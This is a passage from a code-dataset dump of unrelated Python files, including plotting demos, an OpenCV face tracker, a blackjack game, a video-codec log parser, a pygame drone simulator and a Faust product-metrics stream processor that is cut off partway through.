label');\nall_sample_title = 'Accuracy Score: {0}'.format(score)\nplt.title(all_sample_title, size = 20);\n \n# Plotting misclassified pictures\nindex = 0\nmisclassifiedIndexes = []\nfor label, predict in zip(y_test, predictions):\n if label != predict: \n misclassifiedIndexes.append(index)\n index +=1\n\nplt.figure(figsize=(20,4))\nfor plotIndex, badIndex in enumerate(misclassifiedIndexes[0:3]):\n plt.subplot(1, 3, plotIndex + 1)\n plt.imshow(np.reshape(X_test[badIndex], (45, 45)), cmap=plt.cm.gray)\n plt.title('Predicted: {}, Actual: {}'.format(predictions[badIndex], y_test[badIndex]), fontsize = 15) \n\n","sub_path":"logreg_spiral.py","file_name":"logreg_spiral.py","file_ext":"py","file_size_in_byte":4506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"200795163","text":"\n\"\"\"\ncreate an interactive bokeh app to demo a linked subplot array\n\"\"\"\n\nimport numpy as np\nfrom bokeh.plotting import output_file, figure, show\nfrom bokeh.layouts import gridplot, row, column, layout\nfrom pyrb.bokeh import linkfigs\n\n# define data and method for creating a list of bokeh figures\nsamples = 300\nfreq = 2\ntime = np.linspace(0, 1, samples)\ndata = {}\ndata['sin'] = np.sin(2 * np.pi * freq * time)\ndata['cos'] = np.cos(2 * np.pi * freq * time)\ndata['sin-squared'] = np.sin(2 * np.pi * freq * time) ** 2\ndata['cos-squared'] = np.cos(2 * np.pi * freq * time) ** 2\ndef make_figs():\n figs = []\n for trig in data.keys():\n title = '{}, f = {}Hz, fs = {}Hz'.format(trig, freq, samples)\n figs.append(figure(title=title))\n figs[-1].circle(time, data[trig])\n figs[-1].line(time, data[trig])\n return figs\n\n# create a linked subplot array using a column layout\n# figs = make_figs()\n# linkfigs(figs, axis='xy')\n# output_file('column layout.html')\n# show(column(figs, sizing_mode='stretch_both'))\n\n# create a linked subplot array using the other column layout\n# from pyrb.bokeh import column\n# figs = make_figs()\n# linkfigs(figs, axis='xy')\n# output_file('other column layout.html')\n# show(column(figs, sizing_mode='stretch_both', toolbar_location='right'))\n\n# create a linked subplot array using a gridplot layout\nfigs = make_figs()\nlinkfigs(figs, axis='xy')\noutput_file('gridplot layout.html')\nshow(gridplot(figs, ncols=1, sizing_mode='stretch_both', toolbar_location='right'))\n","sub_path":"bokeh/linked.py","file_name":"linked.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"627254830","text":"\n\nfrom swarm import Swarm\n\ndef test_get_closest_particle():\n positions = ([\n [3,0,0],\n [4,0,0],\n ])\n\n velocities = ([\n [2,0,0],\n [0,0,0],\n ])\n\n accelerations = ([\n [-1,0,0],\n [-2,0,0],\n ])\n\n s = Swarm(positions, velocities, accelerations)\n\n s.run(10)\n\n assert s.getClosestParticleIndex() == 0\n","sub_path":"20/test_part1.py","file_name":"test_part1.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"295801713","text":"import cv2\r\nimport sys\r\nimport numpy as np\r\nfrom math import sin, cos, radians\r\nfrom time import sleep\r\n############################ Set up our static variables ############################\r\n\r\n# Open filepaths for cascades\r\nclassifier_pth = '/home/pi/Downloads/opencv-master/data/haarcascades/'\r\neyes_cascade = cv2.CascadeClassifier(''.join([classifier_pth, 'haarcascade_eye.xml']))\r\nface_cascade = cv2.CascadeClassifier(''.join([classifier_pth, 'haarcascade_frontalface_default.xml']))\r\nprof_cascade = cv2.CascadeClassifier(''.join([classifier_pth, 'haarcascade_profileface.xml']))\r\n\r\n# Set colors for each cascade\r\neyes_clr = (255, 0, 0)\r\nface_clr = (0, 0, 0)\r\nprof_clr = (255, 255, 255)\r\nbox_line_width = 2 # Thickness for boxes that highlight our features\r\n\r\n# Custom processing settings for each cascade\r\neyes_settings = {\r\n 'scaleFactor': 20, \r\n 'minNeighbors': 3, # Discriminate a bit more strongly on what is an eye\r\n 'minSize': (10, 10) # Allow for eyes to be smaller than other features\r\n }\r\n\r\nface_settings = {\r\n 'scaleFactor': 1.1, \r\n 'minNeighbors': 3, \r\n 'minSize': (20, 20)\r\n }\r\n\r\nprof_settings = {\r\n 'scaleFactor': 1.1, \r\n 'minNeighbors': 5, \r\n 'minSize': (20, 20)\r\n }\r\n\r\n\r\n# Other things\r\nangs2scan = [25, -25] # Angles we want to scan through if we don't find anything @ 0 degrees\r\n\r\n# TODO: Stuff to highlight whether or not we're in/our of bounds\r\n# bound_coords = [1,2,3,4] # Some list of coordinates to define the limits for when we move the camera\r\n# coord_list_len = 10 # Length of our list to store our coordinates; this will help prevent spurious movements\r\n# in_clr = (0, 255, 0) \r\n# out_clr = (0, 0, 255) \r\n\r\n\r\n############################ Define our helper functions ############################\r\n# Function to rotate our images\r\ndef rotate_image(image, angle):\r\n if angle == 0: return image\r\n height, width = image.shape[:2]\r\n rot_mat = cv2.getRotationMatrix2D((width/2, height/2), angle, 0.9)\r\n result = cv2.warpAffine(image, rot_mat, (width, height), flags=cv2.INTER_LINEAR)\r\n return result\r\n\r\n# Function to rotate any detected features back to original frame of reference\r\ndef rotate_point(pos, img, angle):\r\n if angle == 0: return pos\r\n \r\n # Iterate through all of the highlighted features and translate the coordinates\r\n for k in range( np.shape(pos)[0] ):\r\n \r\n x = pos[k,0] - img.shape[1]*0.4\r\n y = pos[k,1] - img.shape[0]*0.4\r\n newx = x*cos(radians(angle)) + y*sin(radians(angle)) + img.shape[1]*0.4\r\n newy = -x*sin(radians(angle)) + y*cos(radians(angle)) + img.shape[0]*0.4\r\n \r\n pos[k, :] = np.array([int(newx), int(newy), pos[k,2], pos[k,3]])\r\n \r\n return pos\r\n\r\n\r\n# Function to use a haars cascade and find features\r\n# TODO: We'll want to store our coordinates for output at some later point...\r\ndef find_feature(cascade, box_clr, settings, gray, frame, angle):\r\n feature = cascade.detectMultiScale(gray, **settings)\r\n \r\n # Draw a rectangle around the features\r\n if len(feature) > 0:\r\n # Flag that we found something\r\n feature_found = True \r\n \r\n # Rotate our boxes based off of the original frame dimensions if-needed\r\n feature = rotate_point(feature, frame, -angle)\r\n \r\n # Draw the box\r\n for (x, y, w, h) in feature:\r\n cv2.rectangle(frame, (x, y), (x+w, y+h), box_clr, box_line_width)\r\n else:\r\n # Flag that we didn't find anything\r\n feature_found = False\r\n \r\n return frame, feature_found, feature\r\n\r\n\r\n# Other functions as-needed\r\n# Function to check if our coordinated are within bounds or if we need to move\r\n# def within_bounds(coord_list, bounds)\r\n # We could either look at the moving average with a window that's of length N:\r\n # https://stackoverflow.com/questions/14313510/how-to-calculate-rolling-moving-average-using-numpy-scipy\r\n # or perhaps we want to just check if the mean/median of the list coordinates\r\n # is within bounds; we'll probably need to do some experimentation to see what works best\r\n \r\n # loop through each feature\r\n # check to see that the feature is within our bounding box\r\n # return True, 0 if we're within bounds, return false, amount to move if oob\r\n # return True\r\n \r\n# Function to move our motors if we're out of bounds\r\n#def motor_movement(parameters):\r\n #calculate distance needed to move by motor\r\n #convert to radians/measure\r\n #return values to be read by servos\r\n \r\n\r\n############################ Do the main loop ############################\r\n\r\n# Open a connection to the webcam \r\nvideo_capture = cv2.VideoCapture(0)\r\n\r\n# Main loop; this runs forever now, but we can tie it to a hardware switch that\r\n# will make it stop\r\nwhile True: \r\n # Pull a frame from the camera && convert to grayscale\r\n ret, frame = video_capture.read()\r\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\r\n\r\n # IMPORTANT! We ONLY want to call find_feature if we haven't found anything\r\n # so that we minimize the amount of processing. We can determine later if\r\n # we still want to process multiple cascades for better error checking/\r\n # redundancy down the road.\r\n \r\n # Look for faces\r\n angle = 0\r\n found = False\r\n frame, found, coords = find_feature(face_cascade, face_clr, face_settings, gray, frame, angle)\r\n if not(found):\r\n # If we didn't find anything without rotating our frames, let's \r\n # check for face profiles\r\n frame, found, coords = find_feature(prof_cascade, prof_clr, prof_settings, gray, frame, angle)\r\n \r\n if not(found):\r\n # If we STILL didn't find anything, let's continue to search\r\n # first for regular faces, then face profiles at each angle. \r\n # We begin by rotating the image, then checking each cascade.\r\n for angle in angs2scan:\r\n # print(angle) # for debugging to make sure that we break the\r\n # loop as soon as we find a feature\r\n gray_rot = rotate_image(gray, angle)\r\n \r\n # Check rotated image for faces\r\n frame, found, coords = find_feature(prof_cascade, prof_clr, prof_settings, gray_rot, frame, angle)\r\n if found:\r\n # If we found something, we can break the FOR loop so\r\n # that we don't need to perform the other rotations/scans\r\n break\r\n else:\r\n # Check the rotated image for profiles\r\n frame, found, coords = find_feature(prof_cascade, prof_clr, prof_settings, gray_rot, frame, angle)\r\n if found: break\r\n \r\n \r\n # If we still haven't found anything, let's check for eyes\r\n if not(found):\r\n angle = 0\r\n frame, found, coords = find_feature(eyes_cascade, eyes_clr, eyes_settings, gray, frame, angle)\r\n \r\n # TODO: Finally, check if we're within bounds and move if needed...\r\n # 1. Collapse our list into the typical value (probably the mean or median of the list),\r\n # add it into a queue of coordinates\r\n # 2. Add the collapsed coordinates to a queue or something like that\r\n # 3. Check if we're within bounds\r\n # 4. If within bounds, add a green boundary box, otherwise add a red \r\n # boundary box and reset our queue. We'll eventually replace \r\n # these boxes with our motor_movement() and/or other function(s)\r\n \r\n \r\n # Display our detected features (this is only for our debugging at this point)\r\n cv2.imshow('Video', frame)\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n \r\n# Closing\r\nvideo_capture.release()\r\ncv2.destroyAllWindows()\r\n","sub_path":"Haar/SPOILER_tracker_pseudo_code_fleshed_v0.py","file_name":"SPOILER_tracker_pseudo_code_fleshed_v0.py","file_ext":"py","file_size_in_byte":7805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"55436894","text":"from random import randrange\n\nbody = 0\nwhile body < 21:\n print(\"Máš\", body, \"bodů\")\n odpoved = input(\"Přeješ si otočit kartu? \")\n if odpoved == \"ano\":\n karta = randrange(2, 11)\n print(\"Otočil jsi kartu s hodnotou\", karta)\n body = body + karta\n elif odpoved == \"ne\":\n break\n else:\n print(\"Nerozumím použij odpovědi: ano / ne\")\n\n\nif body == 21:\n print(\"Gratuluji! Vyhráváš!\")\n\nelif body > 21:\n print(\"Smůla! Prohrál jsi.\")\n\nelse:\n print(\"Škoda chybělo ti\", 21 - body, \"bodů do 21 bodů!\")","sub_path":"03/OkoBere.py","file_name":"OkoBere.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"499652657","text":"import os\n\n#homepath = \"/home/icaro\"\nhomepath = \"/home/grellert\"\n\npathin = \"%s/testesHEVC/out/0919\"%homepath\nout = open(\"%s/testesHEVC/hm0919.csv\"%homepath,\"w\")\n\nout6t = open(\"%s/testesHEVC/hm6t0919.csv\"%homepath,\"w\")\nout4t = open(\"%s/testesHEVC/hm4t0919.csv\"%homepath,\"w\")\nout2t = open(\"%s/testesHEVC/hm2t0919.csv\"%homepath,\"w\")\n\nyuvs = sorted(os.listdir(\"%s\"%pathin))\n\nlinha = \"YUV,Bitrate,Y-PSNR,U-PSNR,V-PSNR,YUV-PSNR,Time\"\nprint >> out, linha\nprint >> out4t, linha\nprint >> out2t, linha\nprint >> out6t, linha\n\nfor yuv in yuvs:\n\tif \"bin\" in yuv:\n\t\tcontinue\n\tfile = open(\"%s/%s\"%(pathin,yuv),\"r\")\n\tlines = file.readlines()\n\tline = lines[-5]\n\ta,time = line.split(\":\")\n\tt,s = time.split(\"s\")\n\tt = t.strip(\" \")\n\tline = lines[-25]\n\tf,r = line.split(\"a\")\n\tr = r.strip(\" \")\n\tbr,yp,up,vp,yuvp = r.split(\" \")\n\tyuvp = yuvp[:-1]\n\n\tlinha = \"%s,%s,%s,%s,%s,%s,%s\"%(yuv,br,yp,up,vp,yuvp,t)\n\n\tif \"4taps\" in yuv:\n\t\tprint >> out4t, linha\n\telif \"6taps\" in yuv:\n\t\tprint >> out6t, linha\n\telif \"2taps\" in yuv:\n\t\tprint >> out2t, linha\n\telse:\n\t\tprint >> out, linha\n\n\tout.close\n\tout2t.close\n\tout4t.close\n\tout6t.close\n","sub_path":"parser/parser_hm_taps.py","file_name":"parser_hm_taps.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"219891361","text":"import pygame\r\nimport copy\r\nimport sys\r\nimport math\r\nimport logging\r\nimport controler\r\nimport time\r\nimport numpy as np\r\nimport threading\r\nfrom dataclasses import dataclass\r\n\r\nclass Drone:\r\n space_config = {\r\n 'x_min': -60.0,\r\n 'x_max': 60.0,\r\n 'y_min': -10.0,\r\n 'y_max': 60.0,\r\n }\r\n def __init__(self, image,frameconfig): \r\n self.image = image\r\n self.__base_image=image\r\n self.angle = 0\r\n self.frameconfig=frameconfig\r\n self.space_config=Drone.space_config\r\n # [x,y] vector\r\n self.posByCenter(0,0)\r\n \r\n def translate(self,x_speed,y_speed):\r\n x_speed,y_speed = self.__transformEmulatedToRealVel(x_speed,y_speed)\r\n self.pos = self.pos.move(x_speed, y_speed)\r\n if self.pos.right > self.frameconfig['width']:\r\n self.pos.right = self.frameconfig['width']\r\n if self.pos.bottom > self.frameconfig['height']:\r\n self.pos.bottom = self.frameconfig['height']\r\n if self.pos.left < 0:\r\n self.pos.left = 0\r\n if self.pos.top < 0:\r\n self.pos.top = 0\r\n \r\n def posByCenter(self,x_pos,y_pos):\r\n x_pos,y_pos=self.__transformEmulatedToRealCoord(x_pos,y_pos)\r\n self.image.get_rect().center=(x_pos,y_pos)\r\n self.pos=self.image.get_rect()\r\n self.pos.center=(x_pos,y_pos)\r\n\r\n def set_rotation(self,angle):\r\n x,y=self.pos.center\r\n self.angle=angle\r\n self.image=pygame.transform.rotate(self.__base_image,self.angle)\r\n x_pos,y_pos= self.__transformRealToEmulatedCoord(x,y)\r\n self.posByCenter(x_pos,y_pos)\r\n\r\n def rotate(self,angle_speed):\r\n self.set_rotation(self.angle+angle_speed)\r\n\r\n def __transformEmulatedToRealCoord(self, x, y): \r\n y_factor = -self.frameconfig['height']/(self.space_config['y_max']-self.space_config['y_min'])\r\n x_factor = self.frameconfig['width']/(self.space_config['x_max']-self.space_config['x_min'])\r\n y_transformed= y_factor*y+(self.space_config['y_max'])*self.frameconfig['height']/(self.space_config['y_max']-self.space_config['y_min'])\r\n x_transformed= x_factor*x-(self.space_config['x_min'])*self.frameconfig['width']/(self.space_config['x_max']-self.space_config['x_min'])\r\n return [x_transformed,y_transformed]\r\n\r\n def __transformRealToEmulatedCoord(self, x, y): \r\n y_factor = -self.frameconfig['height']/(self.space_config['y_max']-self.space_config['y_min'])\r\n x_factor = self.frameconfig['width']/(self.space_config['x_max']-self.space_config['x_min'])\r\n y_transformed= (y-(self.space_config['y_max'])*self.frameconfig['height']/(self.space_config['y_max']-self.space_config['y_min']))/y_factor\r\n x_transformed= (x+(self.space_config['x_min'])*self.frameconfig['width']/(self.space_config['x_max']-self.space_config['x_min']))/x_factor\r\n return [x_transformed,y_transformed]\r\n\r\n def __transformEmulatedToRealVel(self, x, y): \r\n y_factor = -self.frameconfig['height']/(self.space_config['y_max']-self.space_config['y_min'])\r\n x_factor = self.frameconfig['width']/(self.space_config['x_max']-self.space_config['x_min'])\r\n y_transformed= y_factor*y\r\n x_transformed= x_factor*x\r\n return [x_transformed,y_transformed]\r\n\r\n def __transformRealToEmulatedVel(self, x, y): \r\n y_factor = -self.frameconfig['height']/(self.space_config['y_max']-self.space_config['y_min'])\r\n x_factor = self.frameconfig['width']/(self.space_config['x_max']-self.space_config['x_min'])\r\n y_transformed= y/y_factor\r\n x_transformed= x/x_factor\r\n return [x_transformed,y_transformed]\r\n\r\nclass Target:\r\n @dataclass\r\n class Point:\r\n x: float\r\n y: float\r\n\r\n def __init__(self,x_co,y_co):\r\n self.t_point = Target.Point(x_co,y_co)\r\n self.velocity =2.0 #base velocity\r\n self.aceleration = 0.0 #only for muvControl\r\n self.space_config= Drone.space_config\r\n self.instant_vector=[0,0]\r\n self.refresh=self.mruControl\r\n\r\n def getVector(self):\r\n return np.array([self.t_point.x,self.t_point.y]).transpose()\r\n \r\n def setX(self,value):\r\n new_x= value \r\n if new_x <= self.space_config['x_max'] and new_x >= self.space_config['x_min']:\r\n self.t_point.x = new_x\r\n\r\n def setY(self,value):\r\n new_y= value\r\n if new_y <= self.space_config['y_max'] and new_y >= self.space_config['y_min']:\r\n self.t_point.y =new_y\r\n\r\n def translateX(self,value):\r\n new_x= self.t_point.x + value \r\n if new_x <= self.space_config['x_max'] and new_x >= self.space_config['x_min']:\r\n self.t_point.x = new_x\r\n\r\n def translateY(self,value):\r\n new_y= self.t_point.y + value\r\n if new_y <= self.space_config['y_max'] and new_y >= self.space_config['y_min']:\r\n self.t_point.y =new_y\r\n\r\n def setLocal(self,xy_tuple):\r\n self.setX(xy_tuple[0])\r\n self.setY(xy_tuple[1])\r\n\r\n def mruControl(self,instant):\r\n self.translateX(self.velocity*instant[0])\r\n self.translateY(self.velocity*instant[1])\r\n\r\n #TODO\r\n def muvControl(self):\r\n pass\r\n\r\ndef eventKeyHandler(event,o):\r\n ###implementing mru control\r\n \r\n #region for muvControl ignore it for now\r\n sighn=None\r\n logging.debug('Key Handler')\r\n if event.type == pygame.KEYUP:\r\n logging.debug(\"KeyUp Event\")\r\n sighn = -1.0\r\n elif event.type == pygame.KEYDOWN:\r\n logging.debug(\"KeyDown Event\")\r\n sighn = 1.0\r\n #endregion\r\n \r\n if event.key == pygame.K_UP:\r\n logging.debug('UP Key Pressed')\r\n o.refresh((0,1))\r\n return\r\n elif event.key == pygame.K_DOWN:\r\n logging.debug(\"DOWN Key Pressed\")\r\n o.refresh((0,-1))\r\n return\r\n elif event.key == pygame.K_LEFT:\r\n logging.debug(\"LEFT Key Pressed\")\r\n o.refresh((-1,0))\r\n return\r\n elif event.key == pygame.K_RIGHT:\r\n logging.debug(\"RIGHT Key Pressed\")\r\n o.refresh((1,0))\r\n return\r\n \r\n if event.key == pygame.K_w:\r\n logging.debug('W Key Pressed')\r\n o.refresh((0,1))\r\n return\r\n elif event.key == pygame.K_s:\r\n logging.debug(\"S Key Pressed\")\r\n o.refresh((0,1))\r\n return\r\n elif event.key == pygame.K_a:\r\n logging.debug(\"D Key Pressed\")\r\n o.refresh((0,1))\r\n return\r\n elif event.key == pygame.K_d:\r\n logging.debug(\"A Key Pressed\")\r\n o.refresh((0,1))\r\n return\r\n\r\n \r\n logging.debug(\"Unknow Key Pressed: \" + str(event.key))\r\n\r\ndef mainFrameHandle(simulator):\r\n frameconfig={\r\n 'width': 1200,\r\n 'height': 600\r\n }\r\n screen = pygame.display.set_mode((frameconfig['width'],frameconfig['height']))\r\n player = pygame.image.load('drone.png.')\r\n player = pygame.transform.scale(player,(160,80))\r\n background = pygame.image.load('background.jpg') \r\n background = pygame.transform.scale(background,(1200,600))\r\n screen.blit(background, (0, 0))\r\n o = Drone(player,frameconfig)\r\n target = simulator.r_\r\n showing_state = [0,0,0,0]\r\n while True:\r\n last_delta_tick = copy.deepcopy(np.minimum(simulator.last_delta_tick,80))\r\n state_vector = copy.deepcopy(simulator.x)\r\n screen.blit(background, o.pos, o.pos)\r\n \r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n exit()\r\n elif event.type == pygame.KEYDOWN or event.type == pygame.KEYUP:\r\n eventKeyHandler(event,target)\r\n\r\n\r\n memory_ocup= len(state_vector[1,:])\r\n show_row= memory_ocup-2*last_delta_tick\r\n if testDataQuality(showing_state,state_vector[2,show_row],state_vector[3,show_row],state_vector[6,show_row]):\r\n o.posByCenter(showing_state[0],showing_state[1])\r\n o.set_rotation(showing_state[2]*180/np.pi)\r\n showing_state = [state_vector[2,show_row],state_vector[3,show_row],state_vector[6,show_row],state_vector[8,show_row]] \r\n screen.blit(o.image, o.pos)\r\n pygame.display.update()\r\n\r\ndef testDataQuality(showing_state,x,y,rot):\r\n threshold = 1\r\n delta_x = showing_state[0]-x\r\n delta_y = showing_state[1]-y\r\n delta_rot = showing_state[2]-rot\r\n norma = math.sqrt(delta_x**2+delta_y**2+delta_rot**2)\r\n if (norma>1) or showing_state[3]!=1:\r\n logging.debug('norma:' + str(norma))\r\n return False\r\n else:\r\n return True\r\n\r\ndef simulationHandle(simulator):\r\n while True:\r\n simulator.nextStep()\r\n\r\ndef main():\r\n target = Target(0,0)\r\n simulator = controler.IteractiveSimulator(35,target)\r\n simulator.fillTimeWindow()\r\n sim_thread = threading.Thread(target=simulationHandle,args=(simulator,),daemon=True)\r\n sim_thread.start()\r\n frame_thread = threading.Thread(target=mainFrameHandle,args=(simulator,))\r\n frame_thread.start()\r\n try:\r\n while True:\r\n a=input()\r\n x, y=[float(i) for i in a.split(',')]\r\n print('target point ({},{})'.format(x, y))\r\n target.setLocal((x,y))\r\n finally:\r\n exit()\r\n\r\n\r\nif __name__ == '__main__':\r\n logger=logging.basicConfig(encoding='utf-8', level=logging.ERROR)\r\n main()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"313600824","text":"num = int(input())\r\nfor _ in range(num):\r\n p = list(input().strip())\r\n n = int(input())\r\n arr = list(map(int,input().replace(\"[\",\" \").replace(\"]\",\" \").replace(\",\",\" \").split()))\r\n check=0\r\n r=1\r\n for i in p:\r\n if i==\"R\":\r\n r*=-1\r\n else:\r\n if len(arr)==0:\r\n print(\"error\")\r\n check=1\r\n break\r\n else:\r\n if r<0:\r\n del arr[len(arr)-1]\r\n else:\r\n del arr[0]\r\n if check!=1:\r\n if r < 0:\r\n arr.reverse()\r\n print(\"[\", end=\"\")\r\n print(\",\".join(map(str,arr)), end=\"\")\r\n print(\"]\")","sub_path":"powerful104/5430.py","file_name":"5430.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"10638890","text":"import json\nimport sys\nimport time\nimport faust\nimport asyncio\nfrom decimal import Decimal\nfrom datetime import datetime\n\nsys.path.append('..')\n\nfrom config import *\nfrom util.log import logger\n\nengine = None\n\nimport faust\nfrom typing import List, Dict, Optional, Any\nfrom decimal import Decimal\nfrom datetime import datetime\nfrom config import *\n\n\nclass BaseState:\n\n def show_diff(self, state):\n dct = state.to_representation()\n for k, v in self.to_representation().items():\n if k == '__faust':\n continue\n print(\"{}:\\t{}\\t=>\\t{}\".format(k, v, dct.get(k)))\n\n\nclass ProductTask(faust.Record, serializer='json', coerce=True):\n batch_time: datetime\n site: str\n item_ids: list = []\n category_id: str = ''\n\n\nclass SdkProductTask(faust.Record, serializer='json', coerce=True, include_metadata=False):\n batch_time: datetime\n site: str\n item_id: str\n\n\nclass ProductData(faust.Record, serializer='json', coerce=True):\n timestamp: int = 0\n item_id: str = ''\n site: str = ''\n brand: str = ''\n seller: str = ''\n category_ids: List[str] = []\n leaf_category_ids: List[str] = []\n category_paths: List[str] = []\n category_l1_ids: List[str] = []\n category_l2_ids: List[str] = []\n category_l3_ids: List[str] = []\n price: Decimal = Decimal(0)\n visit: int = 0\n sold: int = 0\n img: str = ''\n title: str = ''\n item_location: str = ''\n item_location_country: str = ''\n store: str = ''\n store_location: str = ''\n marketplace: str = ''\n popular: bool = False\n update_time: datetime = datetime.strptime(\"1970-01-03\", \"%Y-%m-%d\")\n gen_time: Optional[datetime] = None\n data_update_time: Optional[datetime] = None\n\n\nclass ProductState(faust.Record, BaseState, serializer='json', coerce=True):\n # item_id: str = ''\n # date: str = datetime.fromtimestamp(0, TZ_SH).strftime(\"%Y-%m-%d\")\n date: str\n timestamp: int\n batch_num: int\n price: Decimal\n new_last: List[int]\n sold_total_last: List[int]\n sold_last: List[int]\n visit_total_last: List[int]\n visit_last: List[int]\n gmv_last: List[Decimal]\n first_date: Optional[str]\n\n\ndefault_product_state = lambda: ProductState(\n date='',\n timestamp=0,\n batch_num=0,\n price=Decimal(0),\n new_last=[0] * PRODUCT_PERIODS,\n sold_total_last=[0] * PRODUCT_TOTAL_PERIODS,\n sold_last=[0] * PRODUCT_PERIODS,\n visit_total_last=[0] * PRODUCT_TOTAL_PERIODS,\n visit_last=[0] * PRODUCT_PERIODS,\n gmv_last=[Decimal(0)] * PRODUCT_PERIODS\n)\n\n\nclass ProductResult(faust.Record, serializer='json', coerce=True):\n item_id: str\n site: str\n date: str\n brand: str\n seller: str\n category_ids: List[str]\n leaf_category_ids: List[str]\n category_paths: List[str]\n category_l1_ids: List[str]\n category_l2_ids: List[str]\n category_l3_ids: List[str]\n price: Decimal\n visit: int\n sold: int\n img: str\n title: str\n item_location: str\n item_location_country: str\n store: str\n store_location: str\n marketplace: str\n popular: bool\n update_time: datetime\n sold_total: int\n sold_last_1: int\n sold_last_3: int\n sold_last_7: int\n sold_last_30: int\n pre_sold_last_1: int\n pre_sold_last_3: int\n pre_sold_last_7: int\n sold_last_1_delta: int\n sold_last_3_delta: int\n sold_last_7_delta: int\n sold_last_1_pop: float\n sold_last_3_pop: float\n sold_last_7_pop: float\n sold_2_to_last: int\n sold_3_to_last: int\n sold_4_to_last: int\n sold_5_to_last: int\n sold_6_to_last: int\n sold_7_to_last: int\n gmv_last_1: Decimal\n gmv_last_3: Decimal\n gmv_last_7: Decimal\n gmv_last_30: Decimal\n pre_gmv_last_1: Decimal\n pre_gmv_last_3: Decimal\n pre_gmv_last_7: Decimal\n gmv_last_1_delta: Decimal\n gmv_last_3_delta: Decimal\n gmv_last_7_delta: Decimal\n gmv_last_1_pop: float\n gmv_last_3_pop: float\n gmv_last_7_pop: float\n gmv_2_to_last: Decimal\n gmv_3_to_last: Decimal\n gmv_4_to_last: Decimal\n gmv_5_to_last: Decimal\n gmv_6_to_last: Decimal\n gmv_7_to_last: Decimal\n visit_total: int\n visit_last_1: int\n visit_last_3: int\n visit_last_7: int\n cvr_total: float\n cvr_last_1: float\n cvr_last_3: float\n cvr_last_7: float\n new_last_1: int\n new_last_3: int\n new_last_7: int\n gen_time: Optional[datetime]\n data_update_time: Optional[datetime]\n\n\nimport copy\nimport time\nimport random\nimport functools\nfrom decimal import Decimal\nfrom datetime import datetime, timedelta\nfrom config import *\n\n\nclass BaseCalculator:\n\n def __init__(self):\n self.count = 0\n\n def date_range(self, start, end):\n date = start\n while date <= end:\n yield date\n date = date + timedelta(days=1)\n\n def str_to_datetime(self, date_str):\n return datetime.strptime(date_str, \"%Y-%m-%d\")\n\n def datetime_to_str(self, date):\n return date.strftime(\"%Y-%m-%d\")\n\n def incre(self):\n self.count += 1\n\n def reset_count(self):\n self.count = 0\n\n\nclass ProductCalculator(BaseCalculator):\n\n def __init__(self, state_table):\n self.state_table = state_table\n super().__init__()\n\n def initialize(self, key, product_data):\n self.state_key = key\n self.product_info = self.state_table[key]\n # completion\n original_periods_check = len(self.product_info.sold_last)\n if not self.product_info.first_date:\n self.product_info.first_date = \"\"\n if len(self.product_info.sold_last) != PRODUCT_PERIODS:\n for i in range(PRODUCT_PERIODS-original_periods_check):\n self.product_info.sold_last.insert(0, 0)\n self.product_info.visit_last.insert(0, 0)\n self.product_info.gmv_last.insert(0, Decimal('0.00'))\n original_periods = len(self.product_info.sold_last)\n sold_total_periods = len(self.product_info.sold_total_last)\n visit_total_periods = len(self.product_info.visit_total_last)\n print(\"ori:{},sold_total:{}, visit_total:{}\".format(original_periods, sold_total_periods, visit_total_periods))\n self.product_info.date_ls = [self.product_info.date] * original_periods\n self.product_info.sold_total_last = [0] * (original_periods - sold_total_periods) \\\n + self.product_info.sold_total_last\n self.product_info.visit_total_last = [0] * (original_periods - visit_total_periods) \\\n + self.product_info.visit_total_last\n self.product_info.price_last = [self.product_info.price] * original_periods\n # set date\n self.product_data = product_data\n self.product_data.date = datetime.fromtimestamp(self.product_data.timestamp, TZ_SH) \\\n .strftime(\"%Y-%m-%d\")\n # self.product_data.batch_num = (int(time.time()) + 8 * 3600) // 86400\n self.product_data.batch_num = int(self.product_data.update_time.timestamp())\n self.calculate_indexes = set([])\n\n def all_product_data(self, product_data):\n product_data_ls = [product_data]\n if self.product_info.date:\n date_start = self.str_to_datetime(self.product_info.date)\n date_end = self.str_to_datetime(product_data.date)\n price_start = self.product_info.price\n sold_start = self.product_info.sold_total_last[-1]\n visit_start = self.product_info.visit_total_last[-1]\n date_ls = list(self.date_range(date_start, date_end))\n if len(date_ls) > 1:\n price_deltas = self.deltas_generator(price_start, product_data.price,\n len(date_ls) - 1, 'decimal')\n sold_deltas = self.deltas_generator(sold_start, product_data.sold,\n len(date_ls) - 1, 'int')\n visit_deltas = self.deltas_generator(visit_start, product_data.visit,\n len(date_ls) - 1, 'int')\n for i, date in enumerate(date_ls[1:]):\n date_str = self.datetime_to_str(date)\n price_start += price_deltas[i]\n sold_start += sold_deltas[i]\n visit_start += visit_deltas[i]\n if date_str != product_data.date:\n data = ProductData(price=price_start, sold=sold_start,\n visit=visit_start)\n data.date = date_str\n product_data_ls.append(data)\n product_data_ls.sort(key=lambda x: x.date)\n return product_data_ls\n\n def update_state(self, product_data_ls):\n product_data = product_data_ls[-1]\n original_periods = len(self.product_info.sold_last)\n new_start = self.str_to_datetime(product_data.date)\n if self.product_info.date:\n new_start = self.str_to_datetime(self.product_info.date) + timedelta(days=1)\n else:\n self.product_info.sold_total_last[-1] = product_data.sold\n self.product_info.visit_total_last[-1] = product_data.visit\n new_end = self.str_to_datetime(product_data.date)\n for date in self.date_range(new_start, new_end):\n 